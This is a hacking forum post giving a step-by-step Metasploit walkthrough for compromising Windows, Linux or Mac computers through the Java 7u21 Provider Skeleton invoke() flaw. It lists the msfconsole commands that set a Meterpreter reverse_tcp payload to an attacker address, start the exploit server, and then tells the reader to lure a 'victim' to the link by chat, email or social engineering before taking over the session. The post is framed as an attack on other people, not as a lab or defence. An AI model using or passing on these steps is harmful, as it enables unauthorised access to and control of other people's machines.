• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Windows, Linux or MAC PC using Java Applet Provider Skeleton Insecure Invoke Method

TecnoGamesJGY

Social Media Recon Specialist
T Rep
0
0
0
Rep
0
T Vouches
0
0
0
Vouches
0
Posts
149
Likes
24
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
This module abuses the insecure invoke () method of the Provider Skeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

Windows PC

Linux PC

MAC PC

Java 7 update 21

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

2.jpg


Now type use exploit/multi/browser/java_jre17_provider_skeleton

msf exploit (java_jre17_provider_skeleton)>set payload java/Meterpreter/reverse_tcp

msf exploit (java_jre17_provider_skeleton)>set lhost 192.168.1.146 (IP of Local Host)

msf exploit (java_jre17_provider_skeleton)>set srvhost 192.168.1.146 (This must be an address on the local machine)

msf exploit (java_jre17_provider_skeleton)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_provider_skeleton)>exploit

3.jpg


Now an URL you should give to your victim http://192.168.1.146:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

4.jpg


Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

5.jpg
 

425,172

310,807

310,816

Top